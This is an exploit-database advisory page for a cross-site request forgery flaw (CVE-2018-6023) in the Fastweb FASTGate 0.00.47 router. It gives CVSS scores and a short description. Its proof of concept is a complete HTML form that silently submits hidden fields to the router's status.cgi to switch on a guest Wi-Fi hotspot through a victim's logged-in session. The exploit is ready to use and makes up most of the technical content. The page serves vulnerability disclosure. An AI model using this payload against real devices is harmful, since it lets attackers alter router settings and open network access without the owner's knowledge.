Fastweb FASTGate 0.00.47 Cross Site Request Forgery

2018.05.10
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Fastweb FASTgate 0.00.47 CSRF # Date: 09-05-2018 # Exploit Authors: Raffaele Sabato # Contact: https://twitter.com/syrion89 # Vendor: Fastweb # Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/ # Version: 0.00.47 # CVE: CVE-2018-6023 I DESCRIPTION ======================================================================== An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password changing, etc. II PROOF OF CONCEPT ======================================================================== ## Activate Gues Wi-Fi: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.254/status.cgi"> <input type="hidden" name="&#95;" value="1516312144136" /> <input type="hidden" name="act" value="nvset" /> <input type="hidden" name="hotspot&#95;broadcast&#95;ssid" value="1" /> <input type="hidden" name="hotspot&#95;enable" value="1" /> <input type="hidden" name="hotspot&#95;filtering" value="all" /> <input type="hidden" name="hotspot&#95;security" value="WPA2PSK" /> <input type="hidden" name="hotspot&#95;ssid" value="GUEST&#45;Test" /> <input type="hidden" name="hotspot&#95;timeout" value="&#45;1" /> <input type="hidden" name="service" value="wl&#95;guestaccess" /> <input type="submit" value="Submit request" /> </form> </body> </html> III REFERENCES ======================================================================== http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top